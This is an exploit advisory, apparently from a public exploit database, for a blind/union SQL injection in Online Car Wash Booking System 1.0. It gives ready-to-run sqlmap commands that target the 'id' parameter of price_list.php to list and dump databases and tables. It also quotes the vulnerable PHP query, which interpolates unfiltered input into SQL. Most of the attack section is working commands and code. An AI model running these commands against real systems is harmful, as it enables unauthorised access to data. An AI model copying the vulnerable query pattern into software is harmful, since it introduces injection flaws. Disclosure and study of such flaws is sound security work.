Exploit for Online Car Wash Booking System 1.0 Blind SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:166725
# Exploit Title: Online Car Wash Booking System 1.0 - Unauthenticated blind SQL Injection  
# Exploit Author: segf0lt  
# Date: April 14, 2022  
# Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/ocwbs_0.zip  
# Tested on: Ubuntu, Apache, Mysql  
# Version: v1.0  
# Exploit Description:  
# Online Car Wash Booking System 1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a union based SQL Injection attack.  
  
  
# Exploit   
* Exploit with Sqlmap  
  
sqlmap -u "http://localhost/ocwbs/services/price_list.php?id=3" --dbms=mysql -dbs  
  
sqlmap -u "http://localhost/ocwbs/services/price_list.php?id=3" --tables -D ocwbs_db  
  
# Vulnerable Code  
  
* No filter `id` when inserting data to database of price_list.php webpage  
  
if(isset($id)){  
$price_list = $conn->query("SELECT * FROM `price_list` where service_id = '{$id}'");  
$price_arr = array_column($price_list->fetch_all(MYSQLI_ASSOC),'price', 'vehicle_id');  
}